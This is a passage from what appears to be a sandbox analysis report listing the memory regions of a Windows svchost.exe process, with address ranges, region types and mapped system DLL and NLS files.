0x546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1678 start_va = 0x550000 end_va = 0x556fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1679 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1680 start_va = 0x580000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1681 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 1682 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1683 start_va = 0x660000 end_va = 0x666fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1684 start_va = 0x670000 end_va = 0x670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 1685 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 1686 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 1687 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 1688 start_va = 0x6b0000 end_va = 0x6b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 1689 start_va = 0x6c0000 end_va = 0x6c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1690 start_va = 0x6d0000 end_va = 0x6d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1691 start_va = 0x6e0000 end_va = 0x6e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 1692 start_va = 0x6f0000 end_va = 0x6f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 1693 start_va = 0x700000 end_va = 0x706fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1694 start_va = 0x710000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1695 start_va = 0x790000 end_va = 0x796fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1696 start_va = 0x7a0000 end_va = 0x7a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 1697 start_va = 0x7b0000 end_va = 0x7b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 1698 start_va = 0x7d0000 end_va = 0x7d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 1699 start_va = 0x7e0000 end_va = 0x7e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1700 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1701 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 1702 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 1703 start_va = 0xc20000 end_va = 0x101afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 1704 start_va = 0x1020000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1705 start_va = 0x10a0000 end_va = 0x10e4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 1706 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 1707 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1708 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1709 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 1710 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 1711 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 1712 start_va = 0x1780000 end_va = 0x17c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 1713 start_va = 0x17e0000 end_va = 0x17e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 1714 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 1715 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1716 start_va = 0x1a00000 end_va = 0x1d36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1717 start_va = 0x1d40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 1718 start_va = 0x1e40000 end_va = 0x1f1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1719 start_va = 0x1f20000 end_va = 0x1f37fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 1720 start_va = 0x1f40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 1721 start_va = 0x2040000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 1722 start_va = 0x2140000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1723 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1724 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1725 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1726 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1727 start_va = 0x2600000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1728 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 1729 start_va = 0x2780000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 1730 start_va = 0x2880000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 1731 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1732 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 1733 start_va = 0x2b00000 end_va = 0x2b8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1734 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 1735 start_va = 0x2d00000 end_va = 0x2d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 1736 start_va = 0x2d80000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 1737 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 1738 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 1739 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 1740 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 1741 start_va = 0x3300000 end_va = 0x337ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1742 start_va = 0x3380000 end_va = 0x347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 1743 start_va = 0x3480000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 1744 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003500000" filename = "" Region: id = 1745 start_va = 0x3650000 end_va = 0x3656fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 1746 start_va = 0x3660000 end_va = 0x36dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003660000" filename = "" Region: id = 1747 start_va = 0x3700000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 1748 start_va = 0x3800000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 1749 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1750 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 1751 start_va = 0x3b00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b00000" filename = "" Region: id = 1752 start_va = 0x3c00000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 1753 start_va = 0x3d00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 1754 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 1755 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 1756 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 1757 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 1758 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1759 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 1760 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1761 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1762 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1763 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1764 start_va = 0x4800000 end_va = 0x487ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1765 start_va = 0x48d0000 end_va = 0x48d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 1766 start_va = 0x48e0000 end_va = 0x48e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048e0000" filename = "" Region: id = 1767 start_va = 0x49f0000 end_va = 0x49f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 1768 start_va = 0x4a00000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 1769 start_va = 0x4b00000 end_va = 0x4b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 1770 start_va = 0x4bd0000 end_va = 0x4bd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 1771 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 1772 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 1773 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 1774 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 1775 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 1776 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 1777 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 1778 start_va = 0x5400000 end_va = 0x547ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 1779 start_va = 0x54f0000 end_va = 0x55effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054f0000" filename = "" Region: id = 1780 start_va = 0x55f0000 end_va = 0x55f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055f0000" filename = "" Region: id = 1781 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 1782 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 1783 start_va = 0x5800000 end_va = 0x587ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 1784 start_va = 0x5880000 end_va = 0x597ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005880000" filename = "" Region: id = 1785 start_va = 0x5a00000 end_va = 0x5a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 1786 start_va = 0x5a80000 end_va = 0x5b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a80000" filename = "" Region: id = 1787 start_va = 0x5b80000 end_va = 0x5c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 1788 start_va = 0x5c80000 end_va = 0x5d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Region: id = 1789 start_va = 0x5d80000 end_va = 0x5e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d80000" filename = "" Region: id = 1790 start_va = 0x5e80000 end_va = 0x5f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 1791 start_va = 0x5f80000 end_va = 0x607ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f80000" filename = "" Region: id = 1792 start_va = 0x6080000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1793 start_va = 0x6180000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 1794 start_va = 0x63c0000 end_va = 0x64bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063c0000" filename = "" Region: id = 1795 start_va = 0x6560000 end_va = 0x6564fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1796 start_va = 0x6570000 end_va = 0x657ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1797 start_va = 0x6590000 end_va = 0x6596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006590000" filename = "" Region: id = 1798 start_va = 0x65a0000 end_va = 0x669ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065a0000" filename = "" Region: id = 1799 start_va = 0x66a0000 end_va = 0x66b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 1800 start_va = 0x66c0000 end_va = 0x66d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 1801 start_va = 0x66e0000 end_va = 0x66f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 1802 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 1803 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 1804 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 1805 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 1806 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 1807 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 1808 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 1809 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 1810 start_va = 0x6f00000 end_va = 0x6ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 1811 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 1812 start_va = 0x7100000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 1813 start_va = 0x7200000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 1814 start_va = 0x7300000 end_va = 0x7310fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 1815 start_va = 0x7320000 end_va = 0x7330fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 1816 start_va = 0x7340000 end_va = 0x7350fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 1817 start_va = 0x7360000 end_va = 0x7370fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 1818 start_va = 0x7380000 end_va = 0x73a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 1819 start_va = 0x73b0000 end_va = 0x73e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 1820 start_va = 0x73f0000 end_va = 0x7400fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 1821 start_va = 0x7410000 end_va = 0x7420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 1822 start_va = 0x7430000 end_va = 0x7460fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 1823 start_va = 0x7470000 end_va = 0x74a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 1824 start_va = 0x7500000 end_va = 0x75fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007500000" filename = "" Region: id = 1825 start_va = 0x7600000 end_va = 0x76fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007600000" filename = "" Region: id = 1826 start_va = 0x7700000 end_va = 0x77fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007700000" filename = "" Region: id = 1827 start_va = 0x79a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079a0000" filename = "" Region: id = 1828 start_va = 0x7b00000 end_va = 0x7bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b00000" filename = "" Region: id = 1829 start_va = 0x7d00000 end_va = 0x7dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d00000" filename = "" Region: id = 1830 start_va = 0x7e00000 end_va = 0x7efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e00000" filename = "" Region: id = 1831 start_va = 0x7f00000 end_va = 0x7ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f00000" filename = "" Region: id = 1832 start_va = 0x81a0000 end_va = 0x829ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000081a0000" filename = "" Region: id = 1833 start_va = 0x85a0000 end_va = 0x869ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085a0000" filename = "" Region: id = 1834 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1835 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1836 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1837 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1838 start_va = 0x7ff6bac60000 end_va = 0x7ff6bac6cfff monitored = 0 entry_point = 0x7ff6bac63980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1839 start_va = 0x7ffb0a3a0000 end_va = 0x7ffb0a3a7fff monitored = 0 entry_point = 0x7ffb0a3a13b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 1840 start_va = 0x7ffb0a630000 end_va = 0x7ffb0a646fff monitored = 0 entry_point = 0x7ffb0a637520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 1841 start_va = 0x7ffb0a660000 end_va = 0x7ffb0a6a3fff monitored = 0 entry_point = 0x7ffb0a6883e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 1842 start_va = 0x7ffb0a6b0000 end_va = 0x7ffb0a6c7fff monitored = 0 entry_point = 0x7ffb0a6bb850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 1843 start_va = 0x7ffb0a6d0000 end_va = 0x7ffb0a72cfff monitored = 0 entry_point = 0x7ffb0a6fe510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 1844 start_va = 0x7ffb0a860000 end_va = 0x7ffb0ab0ffff monitored = 0 entry_point = 0x7ffb0a861cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1845 start_va = 0x7ffb0ce70000 end_va = 0x7ffb0cf7efff monitored = 0 entry_point = 0x7ffb0ceac010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 1846 start_va = 0x7ffb0cf80000 end_va = 0x7ffb0cf91fff monitored = 0 entry_point = 0x7ffb0cf81a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1847 start_va = 0x7ffb0cfa0000 end_va = 0x7ffb0cfdefff monitored = 0 entry_point = 0x7ffb0cfc82d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1848 start_va = 0x7ffb0e4a0000 end_va = 0x7ffb0e4b0fff monitored = 0 entry_point = 0x7ffb0e4a28d0 region_type = 